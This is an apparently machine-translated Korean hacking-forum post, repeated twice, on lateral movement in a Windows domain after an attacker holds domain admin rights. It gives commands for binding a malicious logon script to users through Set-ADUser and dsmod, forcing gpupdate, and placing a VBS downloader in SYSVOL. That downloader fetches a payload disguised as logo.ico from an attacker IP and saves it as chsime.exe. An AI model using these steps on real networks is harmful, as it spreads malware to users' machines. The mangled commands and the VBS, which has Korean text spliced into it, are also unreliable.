KoreanHackerTeam
Moderator
0x1. 활용 시나리오
도메인 제어 권한 또는 도메인 관리자 및 기타 높은 권한을 얻을 때, 도메인의 PC 호스트로 가로로 이동하려면 다른 당사자는 방화벽을 열고 445 및 135를 통해 수평으로 사용할 수 없으므로 로그인 스크립트 바인딩 방법을 통해 대상 호스트 허가를 얻을 수 있습니다.
0x2. 활용 방법
방법 1 : PowerShell Win2012 이상은 현재 도메인 사용자 정보를 얻기 위해 제공됩니다.
get -aduser -filter * -properties * | Lastlogondate를 정렬하십시오 | 이름, Mail, DistinguishedName, LastLogondate |를 선택하십시오 Export -CSV -Path C: \ Users \ Public \ Documents \ user.csv -Encoding UTF8
지정된 사용자를 바인딩합니다
set -aduser -Idlity Zhangsan -ScriptPath 'download.vbs'
undind
Set -aduser -Idlity Zhangsan -ScriptPath ''
방법 2 : 바인딩을 위해 DSMOD를 사용하십시오
dsMod 사용자 -loscr'download.vbs''cn=John, cn=user, dc=redteam, dc=com '
undind
dsmod user -loscr '' 'cn=John, CN=user, dc=redteam, dc=com'
그룹 정책을 새로 고치십시오
쉘 gpupdate /force
VBS 컨텐츠
strfileurl='http://192.168.172.129:82/logo.ico'strhdlocation='c: \ users \ public \ public \ chsime.exe'set objxmlhttp=createobject ( 'msxml2.xmlhttp'))) strfileurl, falseobjxmlhttp.send () if objxmlhttp.status=200 thenset objadostream=createobject ( 'adodb.stream') objadostream.openobjadostream.type=1 'adtypebinarobjadostream.write. objxmlhttp.responsebodyobjadostream.position=0'startset objfso=createobject ( 'scripting.filesystemobject')에 스트림 위치를 설정합니다. strhdlocationobjadostream.closeset objadostream=nothingendifset objxmlhttp=nothingstrcomputer='.
디렉토리 DC C: \ Windows \ sysvol \ sysvol \ redteam.com \ Scripts \에 업로드하고 메소드를 통해 바인딩하고 그룹 정책을 새로 고치십시오.
도메인 제어 권한 또는 도메인 관리자 및 기타 높은 권한을 얻을 때, 도메인의 PC 호스트로 가로로 이동하려면 다른 당사자는 방화벽을 열고 445 및 135를 통해 수평으로 사용할 수 없으므로 로그인 스크립트 바인딩 방법을 통해 대상 호스트 허가를 얻을 수 있습니다.
0x2. 활용 방법
방법 1 : PowerShell Win2012 이상은 현재 도메인 사용자 정보를 얻기 위해 제공됩니다.
get -aduser -filter * -properties * | Lastlogondate를 정렬하십시오 | 이름, Mail, DistinguishedName, LastLogondate |를 선택하십시오 Export -CSV -Path C: \ Users \ Public \ Documents \ user.csv -Encoding UTF8
지정된 사용자를 바인딩합니다
set -aduser -Idlity Zhangsan -ScriptPath 'download.vbs'
undind
Set -aduser -Idlity Zhangsan -ScriptPath ''
방법 2 : 바인딩을 위해 DSMOD를 사용하십시오
dsMod 사용자 -loscr'download.vbs''cn=John, cn=user, dc=redteam, dc=com '
undind
dsmod user -loscr '' 'cn=John, CN=user, dc=redteam, dc=com'
그룹 정책을 새로 고치십시오
쉘 gpupdate /force
VBS 컨텐츠
strfileurl='http://192.168.172.129:82/logo.ico'strhdlocation='c: \ users \ public \ public \ chsime.exe'set objxmlhttp=createobject ( 'msxml2.xmlhttp'))) strfileurl, falseobjxmlhttp.send () if objxmlhttp.status=200 thenset objadostream=createobject ( 'adodb.stream') objadostream.openobjadostream.type=1 'adtypebinarobjadostream.write. objxmlhttp.responsebodyobjadostream.position=0'startset objfso=createobject ( 'scripting.filesystemobject')에 스트림 위치를 설정합니다. strhdlocationobjadostream.closeset objadostream=nothingendifset objxmlhttp=nothingstrcomputer='.
디렉토리 DC C: \ Windows \ sysvol \ sysvol \ redteam.com \ Scripts \에 업로드하고 메소드를 통해 바인딩하고 그룹 정책을 새로 고치십시오.